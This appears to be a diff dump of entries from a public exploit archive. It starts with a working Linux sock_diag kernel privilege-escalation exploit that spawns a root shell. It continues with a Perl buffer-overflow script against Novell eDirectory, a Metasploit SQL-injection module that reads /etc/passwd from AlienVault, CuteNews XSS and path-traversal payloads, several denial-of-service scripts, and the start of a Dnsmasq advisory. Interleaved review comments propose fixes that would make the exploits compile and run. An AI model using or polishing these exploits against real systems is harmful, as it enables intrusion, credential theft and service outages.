|
||||
#include <linux/filter.h>
|
||||
#include <string.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <linux/sock_diag.h>
|
||||
#include <linux/inet_diag.h>
|
||||
#include <linux/unix_diag.h>
|
||||
#include <sys/mman.h>
|
||||
|
||||
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
|
||||
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
|
||||
_commit_creds commit_creds;
|
||||
_prepare_kernel_cred prepare_kernel_cred;
|
||||
unsigned long sock_diag_handlers, nl_table;
|
||||
|
||||
int __attribute__((regparm(3)))
|
||||
kernel_code()
|
||||
{
|
||||
commit_creds(prepare_kernel_cred(0));
|
||||
return -1;
|
||||
}
|
||||
|
||||
int jump_payload_not_used(void *skb, void *nlh)
|
||||
{
|
||||
asm volatile (
|
||||
"mov $kernel_code, %eax\n"
|
||||
"call *%eax\n"
|
||||
);
|
||||
}
|
||||
|
||||
unsigned long
|
||||
get_symbol(char *name)
|
||||
{
|
||||
FILE *f;
|
||||
unsigned long addr;
|
||||
char dummy, sym[512];
|
||||
int ret = 0;
|
||||
|
||||
f = fopen("/proc/kallsyms", "r");
|
||||
if (!f) {
|
||||
return 0;
|
||||
}
|
||||
|
||||
while (ret != EOF) {
|
||||
ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym);
|
||||
if (ret == 0) {
|
||||
fscanf(f, "%s\n", sym);
|
||||
continue;
|
||||
}
|
||||
if (!strcmp(name, sym)) {
|
||||
printf("[+] resolved symbol %s to %p\n", name, (void *) addr);
|
||||
fclose(f);
|
||||
return addr;
|
||||
}
|
||||
}
|
||||
fclose(f);
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
int main(int argc, char*argv[])
|
||||
{
|
||||
int fd;
|
||||
unsigned family;
|
||||
struct {
|
||||
struct nlmsghdr nlh;
|
||||
struct unix_diag_req r;
|
||||
} req;
|
||||
char buf[8192];
|
||||
|
||||
if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
|
||||
printf("Can't create sock diag socket\n");
|
||||
return -1;
|
||||
}
|
||||
|
||||
memset(&req, 0, sizeof(req));
|
||||
req.nlh.nlmsg_len = sizeof(req);
|
||||
req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
|
||||
req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
|
||||
req.nlh.nlmsg_seq = 123456;
|
||||
|
||||
//req.r.sdiag_family = 89;
|
||||
req.r.udiag_states = -1;
|
||||
req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;
|
||||
|
||||
if(argc==1){
|
||||
printf("Run: %s Fedora|Ubuntu\n",argv[0]);
|
||||
return 0;
|
||||
}
|
||||
else if(strcmp(argv[1],"Fedora")==0){
|
||||
commit_creds = (_commit_creds) get_symbol("commit_creds");
|
||||
prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
|
||||
sock_diag_handlers = get_symbol("sock_diag_handlers");
|
||||
nl_table = get_symbol("nl_table");
|
||||
|
||||
if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table){
|
||||
printf("some symbols are not available!\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
family = (nl_table - sock_diag_handlers) / 4;
|
||||
printf("family=%d\n",family);
|
||||
req.r.sdiag_family = family;
|
||||
|
||||
if(family>255){
|
||||
printf("nl_table is too far!\n");
|
||||
exit(1);
|
||||
}
|
||||
}
|
||||
else if(strcmp(argv[1],"Ubuntu")==0){
|
||||
commit_creds = (_commit_creds) 0xc106bc60;
|
||||
prepare_kernel_cred = (_prepare_kernel_cred) 0xc106bea0;
|
||||
req.r.sdiag_family = 81;
|
||||
}
|
||||
|
||||
unsigned long mmap_start, mmap_size;
|
||||
mmap_start = 0x10000;
|
||||
mmap_size = 0x120000;
|
||||
printf("mmapping at 0x%lx, size = 0x%lx\n", mmap_start, mmap_size);
|
||||
|
||||
if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
|
||||
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
|
||||
printf("mmap fault\n");
|
||||
exit(1);
|
||||
}
|
||||
memset((void*)mmap_start, 0x90, mmap_size);
|
||||
|
||||
char jump[] = "\x55\x89\xe5\xb8\x11\x11\x11\x11\xff\xd0\x5d\xc3"; // jump_payload in asm
|
||||
unsigned long *asd = &jump[4];
|
||||
*asd = (unsigned long)kernel_code;
|
||||
|
||||
memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump));
|
||||
|
||||
if ( send(fd, &req, sizeof(req), 0) < 0) {
|
||||
printf("bad send\n");
|
||||
close(fd);
|
||||
return -1;
|
||||
}
|
||||
|
||||
printf("uid=%d, euid=%d\n",getuid(), geteuid() );
|
||||
|
||||
if(!getuid())
|
||||
system("/bin/sh");
|
||||
|
||||
}
|
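--- a/platforms/linux/remote/33339.txt
+++ b/platforms/linux/remote/33339.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/36958/info
+
+
+CUPS is prone to a cross-site scripting vulnerability because the software fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+NOTE: This vulnerability was originally reported in BID 36956 (Apple Mac OS X 2009-006 Multiple Security Vulnerabilities), but has been given its own record to better document it.
+
+This issue affects versions prior to CUPS 1.4.2.
+
+http://www.example.com/admin/?kerberos=onmouseover=alert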
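--- a/platforms/novell/remote/33351.pl
+++ b/platforms/novell/remote/33351.pl
@@ -0,0 +1,72 @@
+source: http://www.securityfocus.com/bid/37009/info
+
+Novell eDirectory is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
+
+Attackers can exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely cause denial-of-service conditions.
+
+Novell eDirectory 8.8 SP5 is vulnerable; other versions may also be affected.
+
+#!usr\bin\perl
+#Vulnerability has found by HACKATTACK
+
+use WWW::Mechanize;
+
+use LWP::Debug qw(+);
+
+use HTTP::Cookies;
+
+$address=$ARGV[0];
+
+
+if(!$ARGV[0]){
+
+print "Usage:perl $0 address\n";
+
+exit();
+}
+
+
+
+$login = "$address/_LOGIN_SERVER_";
+
+$url = "$address/dhost/";
+
+$module = "modules?I:";
+
+$buffer = "A" x 2000;
+
+
+$vuln = $module.$buffer;
+
+#Edit the username and password.
+
+$user = "username";
+
+$pass = "password";
+
+#Edit the username and password.
+
+my $mechanize = WWW::Mechanize->new();
+
+
+$mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file",autosave => 1));
+
+
+$mechanize->timeout($url_timeout);
+
+$res = $mechanize->request(HTTP::Request->new('GET', "$login"));
+
+
+$mechanize->submit_form(
+
+form_name => "authenticator",
+
+fields => {
+
+usr => $user,
+
+pwd => $pass},
+
+button => 'Login');
+
+$response2 = $mechanize->get("$url$vuln");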
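Review bot: The interpreter line `#!usr\bin\perl` near the top of the script is not a valid path (backslashes, no leading slash), so the file cannot be executed directly; it should be `#!/usr/bin/perl`. The script also interpolates `$cookie_file` into `cookie_jar(...)` and `$url_timeout` into `timeout(...)` without ever assigning either variable, and there is no `use strict;`/`use warnings;` that would flag this; declaring both with a short comment on their intended values would make the script self-explanatory. The prose lines above the code are the BID advisory text and are fine as documentation.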
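--- a/platforms/osx/dos/33337.c
+++ b/platforms/osx/dos/33337.c
@@ -0,0 +1,57 @@
+source: http://www.securityfocus.com/bid/36915/info
+
+Apple Mac OS X is prone to a local denial-of-service vulnerability that is caused by a race condition.
+
+Exploiting this issue allows local, unprivileged users to crash affected kernels, denying further service to legitimate users.
+
+/*
+Mac OS X 10.5.6/10.5.7 ptrace() mutex handling DoS
+==================================================
+This code should be run in a loop and due to problems
+with mutex handling in ptrace a DoS can occur when a
+destroyed mutex is attempted to be interlocked by OSX
+kernel giving rise to a race condition. You may need
+to run this code multiple times.
+
+- Tested against 10.5.6
+- Tested against 10.5.7
+
+while `true`;do ./prdelka-vs-APPLE-ptracepanic;done
+
+This code is dedicated to a friend who I met in this
+place. Long live the exploit scene. R.I.P str0ke.
+
+-- prdelka
+*/
+#include <sys/types.h>
+#include <sys/ptrace.h>
+#include <stdio.h>
+#include <stdlib.h>
+
+
+int main(){
+pid_t pid;
+char *argv[] = {"id","","",0};
+char *envp[] = {"",0};
+pid = fork();
+if(pid == 0){
+usleep(100);
+execve("/usr/bin/id",argv,envp);
+}
+else{
+usleep(820);
+if(ptrace(PT_ATTACH,pid,0,0)==0){
+printf("[ PID: %d has been caught!\n",pid);
+if(ptrace(PT_DETACH,pid,0,0)<0){
+perror("Evil happens.");
+}
+usleep(1);
+wait(0);
+}
+else{
+perror("Fail!");
+}
+}
+return(0);
+}
+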
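Review bot: `main` calls `fork`, `usleep`, `execve` and `wait` but the file only includes `<sys/types.h>`, `<sys/ptrace.h>`, `<stdio.h>` and `<stdlib.h>`; `fork`/`usleep`/`execve` are declared in `<unistd.h>` and `wait` in `<sys/wait.h>`, so as written they are implicit declarations that current compilers reject. The child branch also falls through to `return(0)` when `execve` fails instead of reporting it; `perror("execve"); _exit(1);` after the call would make that failure visible. Indentation appears to have been lost in the rendered view, so the brace structure should be checked against the archived file.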
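--- a/platforms/php/webapps/33317.txt
+++ b/platforms/php/webapps/33317.txt
@@ -0,0 +1,264 @@
+Exploit Title: AlienVault newpolicyform.php SQLi
+Date: 5/9/2014
+Exploit Author: chrisdhebert[at]gmail.com
+Vendor Homepage: http://www.alienvault.com/
+Software Link: http://www.alienvault.com/free-downloads-services
+Version: 4.6.1 and below
+Tested on: Linux
+CVE : n/a
+Vendor Security Advisory : AV-11394 http://forums.alienvault.com/discussion/2690/security-advisories-v4-6-1-and-lower
+
+Timeline:
+--------
+4/14/2014 (Vulnerablity Discovered)
+4/17/2014 (Vendor Informed with receipt)
+5/5/2014 (Vendor Patch Released v4.7.0)
+5/9/2014 (Public Release)
+
+Vendor Discription:
+------------------
+OSSIM is the most widely used SIEM offering, thanks in no small part to the open source
+community that has promoted its use. OSSIM provides all of the capabilities that a security
+professional needs from a SIEM offering, event collection, normalization, correlation and
+incident response - but it also does far more. Not simply satisfied with integrating data
+from existing security tools, OSSIM is built on the Unified Security Management platform
+which provides a common framework for the deployment, configuration, and management of your
+security tools.
+
+Vulnerability Details:
+---------------------
+The vulnerability can be classified as "SQL Injection" from authenticated users. No input validation is performed when processing parameters on the following request:
+GET /ossim/policy/newpolicyform.php?insertafter='SQLi HTTP/1.1
+
+Although this POC demonstrates READ access to files readable by u=mysql g=root o=all (such as /etc/passwd). It should be noted that, an attacker should be able to WRITE to a new file with sufficient permissions such as /tmp/newfile. After a quick search, exploiting this may be midigated by the current file permissions of /usr/share/*ossim/www/* and other vhosts handled by apache. For those with more time, other writeable locations could be leveraged with this vulnerablity.
+
+
+Metasploit Module:
+-----------------
+##
+## This module requires Metasploit: http//metasploit.com/download
+## Current source: https://github.com/rapid7/metasploit-framework
+###
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+include Msf::Exploit::Remote::HttpClient
+
+def initialize(info={})
+super(update_info(info,
+'Name' => "AlienVault Authenticated SQL Injection Arbitrary File Read",
+'Description' => %q{
+AlienVault 4.6.1 and below is susceptible to an authenticated SQL injection attack against
+newpolicyform.php using the 'insertinto' parameter. This module exploits the
+lack of input filtering to read an arbitrary file from the file system.
+Any authenticated user is able to exploit this, as administrator
+privileges are not required.
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'Chris Hebert <chrisdhebert[at]gmail.com>'
+],
+'References' =>
+[
+['EDB', '#####TBD####']
+],
+'DefaultOptions' =>
+{
+'SSL' => true
+},
+'Platform' => ['linux'],
+'Privileged' => false,
+'DisclosureDate' => "May 9 2014"))
+
+register_options(
+[
+Opt::RPORT(443),
+OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd' ]),
+OptString.new('USERNAME', [ true, 'Single username' ]),
+OptString.new('PASSWORD', [ true, 'Single password' ]),
+OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/' ])
+], self.class)
+
+end
+
+def run
+
+print_status("#{peer} - Get a valid session cookie...")
+res = send_request_cgi({
+'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php')
+})
+
+unless res and res.code == 200
+print_error("#{peer} - Server did not respond in an expected way")
+return
+end
+
+cookie = res.get_cookies
+
+if cookie.blank?
+print_error("#{peer} - Could not retrieve a cookie")
+return
+end
+
+post = {
+'embed' => '',
+'bookmark_string' => '',
+'user' => datastore['USERNAME'],
+'passu' => datastore['PASSWORD'],
+'pass' => Rex::Text.encode_base64(datastore['PASSWORD'])
+}
+
+print_status("#{peer} - Login...")
+
+res = send_request_cgi({
+'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php'),
+'method' => 'POST',
+'vars_post' => post,
+'cookie' => cookie
+})
+
+unless res and res.code == 302
+print_error("#{peer} - Server did not respond in an expected way")
+return
+end
+
+unless res.headers['Location'] && res.headers['Location'] == normalize_uri(target_uri.path, 'ossim/')
+print_error("#{peer} - Authentication failed")
+return
+end
+
+cookie = res.get_cookies
+
+if cookie.blank?
+print_error("#{peer} - Could not retrieve the authenticated cookie")
+return
+end
+
+i = 0
+full = ''
+filename = datastore['FILEPATH'].unpack("H*")[0]
+i = 0
+full = ''
+filename = datastore['FILEPATH'].unpack("H*")[0]
+left_marker = Rex::Text.rand_text_alpha(6)
+right_marker = Rex::Text.rand_text_alpha(6)
+
+print_status("#{peer} - Exploiting SQLi...")
+
+loop do
+file = sqli(left_marker, right_marker, i, cookie, filename)
+return if file.nil?
+break if file.empty?
+
+str = [file].pack("H*")
+full << str
+vprint_status(str)
+
+i = i+1
+end
+
+path = store_loot('alienvault.file', 'text/plain', datastore['RHOST'], full, datastore['FILEPATH'])
+print_good("File stored at path: " + path)
+end
+
+def sqli(left_marker, right_marker, i, cookie, filename)
+pay = "X') AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},"
+pay << "(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x#(unknown))) AS CHAR),"
+pay << "0x20)),#{(50*i)+1},50)),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
+pay << " GROUP BY x)a) AND ('xnDa'='xnDa"
+
+get = {
+'insertafter' => pay,
+}
+
+res = send_request_cgi({
+'uri' => normalize_uri(target_uri.path, 'ossim', 'policy', 'newpolicyform.php'),
+'cookie' => cookie,
+'vars_get' => get
+})
+
+if res and res.body and res.body =~ /#{left_marker}(.*)#{right_marker}/
+return $1
+else
+print_error("Server did not respond in an expected way")
+return nil
+end
+end
+
+end
+
+
+
+Metasploit Module Use Example:
+-----------------------------
+msf > use auxiliary/gather/alienvault_newpolicyform_sqli
+msf auxiliary(alienvault_newpolicyform_sqli) > show options
+
+Module options (auxiliary/gather/alienvault_newpolicyform_sqli):
+
+Name Current Setting Required Description
+---- --------------- -------- -----------
+FILEPATH /etc/passwd yes Path to remote file
+PASSWORD putpasswordhere yes Single password
+Proxies no Use a proxy chain
+RHOST 192.168.1.1 yes The target address
+RPORT 443 yes The target port
+TARGETURI / yes Relative URI of installation
+USERNAME admin yes Single username
+VHOST no HTTP server virtual host
+
+msf auxiliary(alienvault_newpolicyform_sqli) > run
+
+[*] 192.168.1.1:443 - Get a valid session cookie...
+[*] 192.168.1.1:443 - Login...
+[*] 192.168.1.1:443 - Exploiting SQLi...
+[+] File stored at path: /home/username/.msf4/loot/20140416053929_default_192.168.1.1_alienvault.file_945139.txt
+[*] Auxiliary module execution completed
+msf auxiliary(alienvault_newpolicyform_sqli) > cat /home/user/.msf4/loot/20140416053929_default_192.168.1.1_alienvault.file_945139.txt
+[*] exec: cat /home/username/.msf4/loot/20140416053929_default_192.168.1.1_alienvault.file_945139.txt
+
+root:x:0:0:root:/root:/usr/bin/llshell
+daemon:x:1:1:daemon:/usr/sbin:/bin/sh
+bin:x:2:2:bin:/bin:/bin/sh
+sys:x:3:3:sys:/dev:/bin/sh
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/bin/sh
+man:x:6:12:man:/var/cache/man:/bin/sh
+lp:x:7:7:lp:/var/spool/lpd:/bin/sh
+mail:x:8:8:mail:/var/mail:/bin/sh
+news:x:9:9:news:/var/spool/news:/bin/sh
+uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
+proxy:x:13:13:proxy:/bin:/bin/sh
+www-data:x:33:33:www-data:/var/www:/bin/sh
+backup:x:34:34:backup:/var/backups:/bin/sh
+list:x:38:38:Mailing List Manager:/var/list:/bin/sh
+irc:x:39:39:ircd:/var/run/ircd:/bin/sh
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
+nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
+libuuid:x:100:101::/var/lib/libuuid:/bin/sh
+sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
+munin:x:102:104::/var/lib/munin:/bin/false
+postfix:x:103:106::/var/spool/postfix:/bin/false
+snmp:x:104:108::/var/lib/snmp:/bin/false
+hacluster:x:105:109:Heartbeat System Account,,,:/usr/lib/heartbeat:/bin/false
+avserver:x:106:111:AlienVault SIEM,,,:/home/avserver:/bin/false
+avapi:x:107:111:AlienVault SIEM,,,:/home/avapi:/bin/bash
+avidm:x:108:111:AlienVault IDM,,,:/home/avidm:/bin/false
+ossec:x:1000:1000::/var/ossec/:/bin/false
+ossecm:x:1001:1000::/var/ossec/:/bin/false
+ossecr:x:1002:1000::/var/ossec/:/bin/false
+ntop:x:109:112::/var/lib/ntop:/bin/false
+avagent:x:110:111:AlienVault Agent,,,:/home/avagent:/bin/false
+snort:x:111:113:Snort IDS:/var/log/snort:/bin/false
+prads:x:112:114::/home/prads:/bin/false
+nagios:x:113:115::/var/lib/nagios:/bin/false
+stunnel4:x:114:116::/var/run/stunnel4:/bin/false
+rabbitmq:x:115:117:RabbitMQ messaging server,,,:/var/lib/rabbitmq:/bin/false
+mysql:x:116:118:MySQL Server,,,:/var/lib/mysql:/bin/false
+
+msf auxiliary(alienvault_newpolicyform_sqli) >
+
+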
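Review bot: The module's 'Description' names the vulnerable parameter as `'insertinto'`, while the advisory text above it (`GET /ossim/policy/newpolicyform.php?insertafter=...`) and the `vars_get` hash in `sqli` both use `insertafter`; the description should read `'insertafter'` so the documentation matches the code and the vendor advisory. In `run`, the three lines `i = 0`, `full = ''` and `filename = datastore['FILEPATH'].unpack("H*")[0]` appear twice in a row, and the second copy is dead code that should be dropped. The `['EDB', '#####TBD####']` reference is a placeholder that should be replaced with the assigned EDB id now that the entry is in the archive.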
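--- a/platforms/php/webapps/33340.txt
+++ b/platforms/php/webapps/33340.txt
@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/36971/info
+
+CuteNews and UTF-8 CuteNews are prone to multiple vulnerabilities, including cross-site scripting, HTML-injection, information-disclosure, arbitrary-script-injection, and security-bypass issues.
+
+Note that exploits for some of the issues may require administrator privilege.
+
+Successful exploits may allow attackers to:
+- obtain sensitive information
+- gain unauthorized access to the affected application
+- run arbitrary script code in the browser of an unsuspecting user in the context of the affected site
+- hijack user sessions
+- execute arbitrary commands in the context of the webserver process
+
+A successful attack will compromise the application and may aid in further attacks.
+
+http://www.example.com/test/cutenews/index.php?lastusername='%3E%3Cscript%3Ealert(/xss/);%3C/script%3E
+http://www.example.com/test/cutenews/index.php?mod=%3Cscript%3Ealert(/xss/)%3C/script%3E
+http://www.example.com/test/cutenews/index.php?mod=editnews&action=list&cat_msg=%3Cscript%3Ealert(/xss/);%3C/script%3E
+http://www.example.com/test/cutenews/index.php?mod=editnews&action=list&source_msg=%3Cscript%3Ealert(/xss/);%3C/script%3E
+http://www.example.com/test/cutenews/index.php?mod=editnews&action=list&postponed_selected=%3E%3Cscript%3Ealert(/xss/);%3C/script%3E
+http://www.example.com/test/cutenews/index.php?mod=editnews&action=list&unapproved_selected=%3E%3Cscript%3Ealert(/xss/);%3C/script%3E
+http://www.example.com/test/cutenews/index.php?mod=editnews&action=list&news_per_page=%3Cscript%3Ealert(/xss/);%3C/script%3E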
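--- a/platforms/php/webapps/33341.txt
+++ b/platforms/php/webapps/33341.txt
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/36971/info
+
+CuteNews and UTF-8 CuteNews are prone to multiple vulnerabilities, including cross-site scripting, HTML-injection, information-disclosure, arbitrary-script-injection, and security-bypass issues.
+
+Note that exploits for some of the issues may require administrator privilege.
+
+Successful exploits may allow attackers to:
+- obtain sensitive information
+- gain unauthorized access to the affected application
+- run arbitrary script code in the browser of an unsuspecting user in the context of the affected site
+- hijack user sessions
+- execute arbitrary commands in the context of the webserver process
+
+A successful attack will compromise the application and may aid in further attacks.
+
+http://www.example.com/test/cutenews/search.php?dosearch=yes&from_date_day=a&from_date_month=5&from_date_year=2003&to_date_day=4&to_date_month=5&to_date_year=2010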
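--- a/platforms/php/webapps/33342.txt
+++ b/platforms/php/webapps/33342.txt
@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/36971/info
+
+CuteNews and UTF-8 CuteNews are prone to multiple vulnerabilities, including cross-site scripting, HTML-injection, information-disclosure, arbitrary-script-injection, and security-bypass issues.
+
+Note that exploits for some of the issues may require administrator privilege.
+
+Successful exploits may allow attackers to:
+- obtain sensitive information
+- gain unauthorized access to the affected application
+- run arbitrary script code in the browser of an unsuspecting user in the context of the affected site
+- hijack user sessions
+- execute arbitrary commands in the context of the webserver process
+
+A successful attack will compromise the application and may aid in further attacks.
+
+http://www.example.com/test/cutenews/search.php?user=%22%3E%3Cscript%3Ealert(/xss/);%3C/script%3E
+http://www.example.com/test/cutenews/search.php?title=%22%3E%3Cscript%3Ealert(/xss/);%3C/script%3E
+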
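--- a/platforms/php/webapps/33343.txt
+++ b/platforms/php/webapps/33343.txt
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/36971/info
+
+CuteNews and UTF-8 CuteNews are prone to multiple vulnerabilities, including cross-site scripting, HTML-injection, information-disclosure, arbitrary-script-injection, and security-bypass issues.
+
+Note that exploits for some of the issues may require administrator privilege.
+
+Successful exploits may allow attackers to:
+- obtain sensitive information
+- gain unauthorized access to the affected application
+- run arbitrary script code in the browser of an unsuspecting user in the context of the affected site
+- hijack user sessions
+- execute arbitrary commands in the context of the webserver process
+
+A successful attack will compromise the application and may aid in further attacks.
+
+http://www.example.com/test/cutenews/register.php?result=%3Cscript%3Ealert(/XSS/);%3C/script%3E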
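--- a/platforms/php/webapps/33344.txt
+++ b/platforms/php/webapps/33344.txt
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/36971/info
+
+CuteNews and UTF-8 CuteNews are prone to multiple vulnerabilities, including cross-site scripting, HTML-injection, information-disclosure, arbitrary-script-injection, and security-bypass issues.
+
+Note that exploits for some of the issues may require administrator privilege.
+
+Successful exploits may allow attackers to:
+- obtain sensitive information
+- gain unauthorized access to the affected application
+- run arbitrary script code in the browser of an unsuspecting user in the context of the affected site
+- hijack user sessions
+- execute arbitrary commands in the context of the webserver process
+
+A successful attack will compromise the application and may aid in further attacks.
+
+http://www.example.com/test/cutenews/index.php?mod=addnews&action=addnews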
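--- a/platforms/php/webapps/33345.txt
+++ b/platforms/php/webapps/33345.txt
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/36971/info
+
+CuteNews and UTF-8 CuteNews are prone to multiple vulnerabilities, including cross-site scripting, HTML-injection, information-disclosure, arbitrary-script-injection, and security-bypass issues.
+
+Note that exploits for some of the issues may require administrator privilege.
+
+Successful exploits may allow attackers to:
+- obtain sensitive information
+- gain unauthorized access to the affected application
+- run arbitrary script code in the browser of an unsuspecting user in the context of the affected site
+- hijack user sessions
+- execute arbitrary commands in the context of the webserver process
+
+A successful attack will compromise the application and may aid in further attacks.
+
+http://www.example.com/test/cutenews/index.php?mod=editnews&action=list&source=../users.db.php%00
+http://www.example.com/test/cutenews/index.php?mod=editnews&action=editnews&id=1255182669&source=../users.db.php%00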
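--- a/platforms/windows/dos/33348.pl
+++ b/platforms/windows/dos/33348.pl
@@ -0,0 +1,39 @@
+# Exploit Title: TFTPD32 4.5 / TFTPD64 4.5 DoS poc
+# Date: 13/05/2014
+# Exploit Author: j0s3h4x0r
+# Homepage: http://tftpd32.jounin.net/tftpd32_testimonials.html
+# Software Link: http://tftpd32.jounin.net/download/tftpd32.450.zip
+# Version: 4.5 32 bits / 4.5 64 bits
+# Tested on: [Windows 7 x64]
+
+#this proof of concept code will crash tftpd32 and tftpd64
+#you can try changing $j and $i loop limits
+#most of the times EIP reaches 0x2E373231 == "127." or any string contained in tftpd32 error logs
+#and sometimes EIP reaches addresses similar to 0x00013200 so Remote Code Execution may be possible using some form of heap-spray
+
+## Exploit-DB Note: $j=5, $i=2500 caused a crash.
+
+
+
+#!/usr/bin/perl -w
+
+use IO::Socket;
+
+for (my $j = 0; $j < 2; $j++)
+{
+sleep(2);
+for (my $i = 0; $i < 1500; $i++)
+{
+$st_socket = IO::Socket::INET->new(Proto=>'udp', PeerAddr=>'127.0.0.1', PeerPort=>69) or die "connect error";
+
+$p_c_buffer = "\x0c\x0d" x 10;
+
+print $st_socket $p_c_buffer;
+
+close($st_socket);
+
+print "sent " . $i . "\n";
+}
+}
+
+exit;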
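Review bot: The `#!/usr/bin/perl -w` line sits below the header comments rather than on line 1, so it neither selects the interpreter nor turns on warnings; either move it to the first line of the file or replace the `-w` with an explicit `use warnings;` next to `use IO::Socket;`. `$st_socket` and `$p_c_buffer` are undeclared package globals; adding `use strict;` and declaring both with `my` inside the inner loop would make the script lint-clean. The header comment already documents the loop limits, so no further documentation is needed.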
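--- a/platforms/windows/dos/33350.xml
+++ b/platforms/windows/dos/33350.xml
@@ -0,0 +1,26 @@
+source: http://www.securityfocus.com/bid/37007/info
+
+Yahoo! Messenger is prone to a denial-of-service vulnerability because of a NULL-pointer dereference error.
+
+A successful attack allows a remote attacker to crash the application using the ActiveX control (typically Internet Explorer), denying further service to legitimate users. Given the nature of this issue, the attacker may also be able to run arbitrary code, but this has not been confirmed.
+
+Yahoo! Messenger 9.0.0.2162 is vulnerable; other versions may also be affected.
+
+<?XML version='1.0' standalone='yes' ?>
+
+<package><job id='DoneInVBS' debug='false' error='true'>
+
+<object classid='clsid:58916BE6-BAFF-4F33-AEFE-B2AA03FE4C86' id='target' />
+
+<script language='vbscript'>
+
+
+arg1=String(11284, "A")
+
+target.RegisterMe arg1
+
+</script>
+
+</job>
+
+</package>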
|
@ -1,24 +1,24 @@
|
|||
#!/usr/bin/python
|
||||
# PacketTrap Networks pt360 2.0.39 TFTPD Remote DOS
|
||||
# Coded by Mati Aharoni
|
||||
# muts..at..offensive-security.com
|
||||
# http://www.offensive-security.com/0day/pt360dos.py.txt
|
||||
|
||||
import socket
|
||||
import sys
|
||||
|
||||
host = '172.16.167.134'
|
||||
port = 69
|
||||
|
||||
try:
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
except:
|
||||
print "socket() failed"
|
||||
sys.exit(1)
|
||||
|
||||
filename = '"'*160
|
||||
mode = "netascii"
|
||||
muha = "\x00\x02" + filename + "\0" + mode + "\0"
|
||||
s.sendto(muha, (host, port))
|
||||
|
||||
# milw0rm.com [2008-03-26]
|
||||
#!/usr/bin/python
|
||||
# PacketTrap Networks pt360 2.0.39 TFTPD Remote DOS
|
||||
# Coded by Mati Aharoni
|
||||
# muts..at..offensive-security.com
|
||||
# http://www.offensive-security.com/0day/pt360dos.py.txt
|
||||
|
||||
import socket
|
||||
import sys
|
||||
|
||||
host = '172.16.167.134'
|
||||
port = 69
|
||||
|
||||
try:
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
except:
|
||||
print "socket() failed"
|
||||
sys.exit(1)
|
||||
|
||||
filename = '"'*160
|
||||
mode = "netascii"
|
||||
muha = "\x00\x02" + filename + "\0" + mode + "\0"
|
||||
s.sendto(muha, (host, port))
|
||||
|
||||
# milw0rm.com [2008-03-26]
|
||||
|
|
|
@ -1,281 +1,281 @@
|
|||
-----BEGIN PGP SIGNED MESSAGE-----
|
||||
Hash: SHA1
|
||||
|
||||
Core Security Technologies - CoreLabs Advisory
|
||||
http://www.coresecurity.com/corelabs/
|
||||
|
||||
Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server
|
||||
|
||||
|
||||
1. *Advisory Information*
|
||||
|
||||
Title: Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server
|
||||
Advisory ID: CORE-2009-0820
|
||||
Advisory URL: http://www.coresecurity.com/content/dnsmasq-vulnerabilities
|
||||
Date published: 2009-08-31
|
||||
Date of last update: 2009-08-31
|
||||
Vendors contacted: Simon Kelley
|
||||
Release mode: Coordinated release
|
||||
|
||||
|
||||
2. *Vulnerability Information*
|
||||
|
||||
Class: Buffer overflow
|
||||
Remotely Exploitable: Yes
|
||||
Locally Exploitable: No
|
||||
Bugtraq ID: 36120, 36121
|
||||
CVE Name: CVE-2009-2957, CVE-2009-2958
|
||||
|
||||
|
||||
3. *Vulnerability Description*
|
||||
|
||||
Dnsmasq is a lightweight DNS forwarder and DHCP server. A vulnerability
|
||||
has been found that may allow an attacker to execute arbitrary code on
|
||||
servers or home routers running dnsmasq[1] with the TFTP service[2][3]
|
||||
